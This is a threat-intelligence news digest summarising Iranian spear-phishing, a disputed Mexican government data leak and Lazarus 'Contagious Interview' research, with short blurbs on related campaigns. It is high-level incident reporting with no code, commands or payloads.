Multiple Unrelated Cybersecurity Reports: Iranian Spear-Phishing, Alleged Mexican Government Data Leak, and Lazarus ‘Contagious Interview’ Findings
The provided items do not describe a single cohesive cybersecurity event; they cover separate incidents and research. Dark Reading reported an Iran-linked credential theft and surveillance effort targeting people of interest abroad (including Iranian expats and regional targets) using spear-phishing and social engineering, including lures delivered via WhatsApp and phishing infrastructure that was rapidly stood up and taken down as campaigns shifted targets.
Separately, Dark Reading covered allegations that the Chronus Group leaked 2.3TB of data purportedly sourced from 25+ Mexican government institutions, claiming exposure affecting 36 million people; Mexico’s ATDT disputed that it represented a new breach, stating it appeared to be aggregated data from prior incidents and that impacted systems were largely obsolete, third-party administered state-level platforms. In parallel, Red Asgard published new technical findings on the Lazarus-linked “Contagious Interview” activity targeting developers/freelancers via fake recruiting, reporting recovery of 241,764 plaintext credentials from unauthenticated endpoints, identification of an AnyDesk-based RAT with persistent remote access and hardcoded attacker credentials, and additional detection content (e.g., YARA and Snort rules).
Timeline
Feb 5, 2026
Researchers expose credential database in Iranian-linked phishing infrastructure
Analysis of the phishing infrastructure uncovered a path traversal flaw that exposed a database containing hundreds of stolen credentials and two-factor authentication codes. The same infrastructure also served fake Gmail login pages and phone-number collection pages.
Feb 5, 2026
Second wave adds Telegram and X impersonation lures
A follow-on wave of the same espionage campaign expanded to new social-engineering themes, including a fake Telegram bot threatening account deletion and an X impersonation of activist Fatema Al Harbi sending fake Google Meet invitations for credential theft. Researchers noted the infrastructure appeared to support both espionage and cybercrime use cases.
Feb 5, 2026
Iran-linked phishing campaign targets expatriates and activists
A highly targeted spear-phishing campaign attributed with varying confidence to Iranian-linked operators began targeting people of interest outside Iran, including expatriates, Syrians, and Israelis. Early lures used WhatsApp-themed messages and DuckDNS-hosted credential-harvesting pages to steal logins and attempt account takeovers.
Feb 4, 2026
Mexico's ATDT disputes breach scale and begins containment actions
Mexico's Agencia de Transformación Digital y Telecomunicaciones said its analysis indicated the dataset was largely an aggregation of information from prior breaches and that no sensitive data publication had been identified. The agency was described as taking initial containment steps such as revoking credentials and supporting remediation.
Feb 4, 2026
Chronus Group claims 2.3TB leak from Mexican government institutions
A hacktivist collective calling itself Chronus Group claimed to have leaked 2.3TB of data allegedly affecting 36 million Mexicans and sourced from at least 25 government institutions. The purportedly exposed information included names, phone numbers, addresses, dates of birth, and IMSS Bienestar registration data.
Feb 3, 2026
Red Asgard publishes detections and reports findings to authorities
Following its investigation, Red Asgard released community detections including 16 YARA rules and 88 Snort rules. The firm also reported the incident to the FBI's IC3 and later to CISA.
Feb 3, 2026
Red Asgard identifies AnyDesk RAT and backend flaws in campaign infrastructure
Researchers identified a fourth malware family, a custom AnyDesk RAT that silently installs and configures AnyDesk for persistent attacker access. They also mapped the backend infrastructure, found an IDOR flaw in the /allinfo endpoint, enumerated operator accounts, and decrypted a custom XOR-based protocol used for beacon scheduling.
Feb 3, 2026
Red Asgard confirms Lazarus-linked C2 is live and leaking victim data
In its continued investigation of the 'Contagious Interview' campaign, Red Asgard determined the command-and-control infrastructure was operational rather than a honeypot. Researchers retrieved 241,764 plaintext credentials tied to 857 victims across 90 countries from unauthenticated HTTP endpoints.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Threat Actors
Organizations
Sources
Related Stories
Mixed threat reporting: APT campaigns, malware delivery via compromised web assets, and ransomware exploitation
The provided items do not describe a single cohesive cybersecurity event; they span multiple unrelated threat reports and opinion pieces. Notable incident-level reporting includes **APT28** activity in Western/Central Europe (“Operation MacroMaze”) using spear-phishing lures with Office macros that beacon via `INCLUDEPICTURE` to `webhook[.]site` and then execute VBScript/CMD/batch stages for persistence and follow-on payload delivery. Separately, **MuddyWater** (Iran/MOIS-linked) was reported running “Operation Olalampo” against organizations in the Middle East and Africa, delivering new custom malware (including a **Char** backdoor using a **Telegram bot** for C2) and, in some cases, attempting exploitation of public-facing servers in addition to phishing. Criminal activity and initial-access tradecraft were also covered across distinct stories: a DFIR case study described exploitation of **Apache ActiveMQ** `CVE-2023-46604` to gain RCE, conduct post-exploitation (Metasploit/Meterpreter, privilege escalation, LSASS access, lateral movement), and ultimately deploy **LockBit**-branded ransomware via RDP using previously stolen credentials (with indications the payload was built using the leaked builder and used *Session* for communications). Multiple reports described malware delivery via compromised web assets and social engineering, including **GrayCharlie** injecting malicious JavaScript into WordPress sites to push **NetSupport RAT**, **Stealc**, and **SectopRAT** via fake updates/ClickFix-style CAPTCHAs, and a separate **ClickFix** campaign delivering a custom C++ RAT (**MIMICRAT**) through fake Cloudflare verification prompts that trick users into running PowerShell. Additional, unrelated threat reporting included a **NuGet** supply-chain attack (typosquatted `NCryptYo` plus companion packages) targeting ASP.NET Identity data and enabling backdoored authorization rules, and malicious Chrome extensions using a “**Promise Bomb**” browser-crash technique to drive users to run fake “CrashFix” PowerShell steps. Several other items were generic commentary/roundups (data breach trends, quantum preparedness, Enigma history, NATO public opinion polling, recon how-to, and a malware-newsletter link list) and do not add event-specific intelligence.
1 months ago
Weekly threat intelligence roundup covering breaches, ransomware, and emerging AI-enabled tradecraft
Reporting during the week of Feb. 23 highlighted multiple unrelated security incidents and research findings rather than a single cohesive event. **France’s Ministry of Economy** disclosed unauthorized access to the national bank account registry **FICOBA**, exposing data tied to **~1.2 million accounts** (e.g., names, addresses, account identifiers, and in some cases tax-related identifiers), with officials attributing access to **compromised government credentials**. Separately, **Advantest** reported a **ransomware** intrusion following third-party unauthorized access, **University of Mississippi Medical Center** experienced a ransomware event that disrupted clinics and electronic medical records, and **Ukraine’s National Bank** reported a **supply-chain** exposure at a contractor supporting its collectible coin online store (customer registration data exposed; payment data reportedly unaffected). In Taiwan, **Taipei Grand Hotel** said a third party accessed internal systems without authorization during the Lunar New Year period; the hotel took networks offline for forensics and warned customers to be cautious of suspicious messages. Threat-actor and technique reporting also described ongoing campaigns and emerging tradecraft. **MuddyWater** (Iran-aligned) was reported targeting **MENA** organizations in “Operation Olalampo,” using phishing lures with malicious Office documents/macros to deploy tooling including **GhostFetch**, **HTTP_VIP**, a Rust backdoor **CHAR**, and an implant dubbed **GhostBackDoor**, with one chain also deploying *AnyDesk* for remote access. Separately, reporting on **DPRK-linked** crypto operations described sustained, social-engineering-led targeting of the crypto ecosystem following the **Bybit** theft, including AI-assisted persona and communication crafting and laundering via mixing/OTC pathways. Additional research noted internet-wide scanning telemetry involving **OAST/Interactsh** callback domains and shifts toward cookie-based injection, while another item profiled PRC-attributed **Lotus Blossom** as an espionage actor (including discussion of the *Notepad++* ecosystem incident) and a separate post provided general reconnaissance methodology rather than incident-specific intelligence.
1 months ago
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access
Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran’s internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.
1 months ago